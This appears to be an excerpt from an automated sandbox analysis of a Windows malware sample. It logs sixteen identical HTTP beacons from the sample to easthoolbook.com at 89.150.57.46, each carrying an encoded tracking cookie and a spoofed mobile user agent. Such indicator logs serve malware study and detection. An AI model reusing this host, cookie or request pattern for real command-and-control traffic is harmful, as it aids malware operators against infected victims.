                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:18 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:37 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:18 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          7 | 192.168.2.6 | 49714 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:21 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:21 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:39 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:21 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          8 | 192.168.2.6 | 49715 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:24 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:24 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:42 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:24 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          9 | 192.168.2.6 | 49716 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:27 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:27 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:45 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:27 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          10 | 192.168.2.6 | 49717 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:30 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:30 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:48 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:30 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          11 | 192.168.2.6 | 49718 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:34 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:34 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:53 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:34 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          12 | 192.168.2.6 | 49719 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:37 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:37 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:56 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:37 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          13 | 192.168.2.6 | 49720 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:40 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:40 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:59 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:40 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          14 | 192.168.2.6 | 49721 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:43 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:43 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:02 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:43 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          15 | 192.168.2.6 | 49722 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:46 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:46 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:05 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:46 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          16 | 192.168.2.6 | 49723 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:49 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:49 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:08 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:49 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          17 | 192.168.2.6 | 49724 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:52 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:52 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:11 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:52 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          18 | 192.168.2.6 | 49726 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:55 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:55 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:14 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:55 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          19 | 192.168.2.6 | 49727 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:31:58 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:58 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:17 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:58 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          20 | 192.168.2.6 | 49728 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:01 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:01 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:20 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:01 UTC | 600 | IN |
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          21 | 192.168.2.6 | 49729 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:05 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:06 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:24 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:06 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          22 | 192.168.2.6 | 49730 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:08 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:09 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:27 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:09 UTC | 600 | IN
